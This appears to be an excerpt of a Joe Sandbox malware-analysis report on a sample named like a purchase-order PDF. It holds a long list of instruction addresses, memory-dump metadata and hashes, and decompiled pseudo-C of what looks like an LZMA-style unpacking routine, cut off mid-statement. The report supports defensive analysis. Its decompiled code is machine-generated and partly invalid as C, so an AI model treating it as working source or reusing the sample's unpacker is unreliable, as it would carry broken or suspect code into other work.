                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c0e
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c59
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c5e
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c76
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406ccd
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd2
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cef
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d35
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073dd
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x00407413
                                            0x0040741a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040741c
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x00000000
                                            0x004075cf
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743b
                                            0x0040743b
                                            0x0040743e
                                            0x00407441
                                            0x00407441
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x00000000
                                            0x00406dec
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406dcf
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x00000000
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x00000000
                                            0x00000000
                                            0x004070ab
                                            0x004070af
                                            0x00000000
                                            0x00000000
                                            0x004070b5
                                            0x004070b9
                                            0x00000000
                                            0x00000000
                                            0x004070bf
                                            0x004070c1
                                            0x004070c5
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x00000000
                                            0x00407137
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00407166
                                            0x00407166
                                            0x00407169
                                            0x00407170
                                            0x00407175
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00000000
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x004073cb
                                            0x004073cb
                                            0x00000000
                                            0x004073cb
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x00407447
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x004070cf
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x00000000
                                            0x00407599
                                            0x004070d9
                                            0x004070dc
                                            0x004070df
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x0040710d
                                            0x0040710d
                                            0x00000000
                                            0x0040710d
                                            0x0040738e
                                            0x004075c3
                                            0x004075e5
                                            0x004075eb
                                            0x004075ed
                                            0x004075f4
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x004075fa
                                            0x004075fa
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406FFE() {
                                            				signed int _t539;
                                            				unsigned short _t540;
                                            				signed int _t541;
                                            				void _t542;
                                            				signed int _t543;
                                            				signed int _t544;
                                            				signed int _t573;
                                            				signed int _t576;
                                            				signed int _t597;
                                            				signed int* _t614;
                                            				void* _t621;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t621 - 0x40) != 1) {
                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                            						_t539 =  *(_t621 - 4) + 0x664;
                                            						 *(_t621 - 0x58) = _t539;
                                            						goto L68;
                                            					} else {
                                            						 *(__ebp - 0x84) = 8;
                                            						while(1) {
                                            							L132:
                                            							 *(_t621 - 0x54) = _t614;
                                            							while(1) {
                                            								L133:
                                            								_t540 =  *_t614;
                                            								_t597 = _t540 & 0x0000ffff;
                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                            								if( *(_t621 - 0xc) >= _t573) {
                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                            									 *(_t621 - 0x40) = 1;
                                            									_t541 = _t540 - (_t540 >> 5);
                                            									 *_t614 = _t541;
                                            								} else {
                                            									 *(_t621 - 0x10) = _t573;
                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                            								}
                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                            									goto L139;
                                            								}
                                            								L137:
                                            								if( *(_t621 - 0x6c) == 0) {
                                            									 *(_t621 - 0x88) = 5;
                                            									L170:
                                            									_t576 = 0x22;
                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                            									_t544 = 0;
                                            									L172:
                                            									return _t544;
                                            								}
                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                            								L139:
                                            								_t542 =  *(_t621 - 0x84);
                                            								while(1) {
                                            									 *(_t621 - 0x88) = _t542;
                                            									while(1) {
                                            										L1:
                                            										_t543 =  *(_t621 - 0x88);
                                            										if(_t543 > 0x1c) {
                                            											break;
                                            										}
                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                            											case 0:
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            												_t543 =  *( *(_t621 - 0x70));
                                            												if(_t543 > 0xe1) {
                                            													goto L171;
                                            												}
                                            												_t547 = _t543 & 0x000000ff;
                                            												_push(0x2d);
                                            												asm("cdq");
                                            												_pop(_t578);
                                            												_push(9);
                                            												_pop(_t579);
                                            												_t617 = _t547 / _t578;
                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                            												asm("cdq");
                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                            												 *(_t621 - 0x3c) = _t612;
                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                            													L10:
                                            													if(_t620 == 0) {
                                            														L12:
                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            														goto L15;
                                            													} else {
                                            														goto L11;
                                            													}
                                            													do {
                                            														L11:
                                            														_t620 = _t620 - 1;
                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                            													} while (_t620 != 0);
                                            													goto L12;
                                            												}
                                            												if( *(_t621 - 4) != 0) {
                                            													GlobalFree( *(_t621 - 4));
                                            												}
                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                            												 *(_t621 - 4) = _t543;
                                            												if(_t543 == 0) {
                                            													goto L171;
                                            												} else {
                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                            													goto L10;
                                            												}
                                            											case 1:
                                            												L13:
                                            												__eflags =  *(_t621 - 0x6c);
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													 *(_t621 - 0x88) = 1;
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                            												_t45 = _t621 - 0x48;
                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                            												__eflags =  *_t45;
                                            												L15:
                                            												if( *(_t621 - 0x48) < 4) {
                                            													goto L13;
                                            												}
                                            												_t555 =  *(_t621 - 0x40);
                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                            													L20:
                                            													 *(_t621 - 0x48) = 5;
                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                            													goto L23;
                                            												}
                                            												 *(_t621 - 0x74) = _t555;
                                            												if( *(_t621 - 8) != 0) {
                                            													GlobalFree( *(_t621 - 8));
                                            												}
                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                            												 *(_t621 - 8) = _t543;
                                            												if(_t543 == 0) {
                                            													goto L171;
                                            												} else {
                                            													goto L20;
                                            												}
                                            											case 2:
                                            												L24:
                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                            												 *(_t621 - 0x84) = 6;
                                            												 *(_t621 - 0x4c) = _t562;
                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                            												goto L132;
                                            											case 3:
                                            												L21:
                                            												__eflags =  *(_t621 - 0x6c);
                                            												if( *(_t621 - 0x6c) == 0) {
                                            													 *(_t621 - 0x88) = 3;
                                            													goto L170;
                                            												}
                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                            												_t67 = _t621 - 0x70;
                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                            												__eflags =  *_t67;
                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                            												L23:
                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                            												if( *(_t621 - 0x48) != 0) {
                                            													goto L21;
                                            												}
                                            												goto L24;
                                            											case 4:
                                            												L133:
                                            												_t540 =  *_t614;
                                            												_t597 = _t540 & 0x0000ffff;
                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                            												if( *(_t621 - 0xc) >= _t573) {
                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                            													 *(_t621 - 0x40) = 1;
                                            													_t541 = _t540 - (_t540 >> 5);
                                            													 *_t614 = _t541;
                                            												} else {
                                            													 *(_t621 - 0x10) = _t573;
                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                            												}
                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                            													goto L139;
                                            												}
                                            											case 5:
                                            												goto L137;
                                            											case 6:
                                            												__edx = 0;
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x34) = 1;
                                            													 *(__ebp - 0x84) = 7;
                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            													L132:
                                            													 *(_t621 - 0x54) = _t614;
                                            													goto L133;
                                            												}
                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            												__esi =  *(__ebp - 0x60);
                                            												__cl = 8;
                                            												__cl = 8 -  *(__ebp - 0x3c);
                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            												__ecx =  *(__ebp - 0x3c);
                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            												__ecx =  *(__ebp - 4);
                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            												__eflags =  *(__ebp - 0x38) - 4;
                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
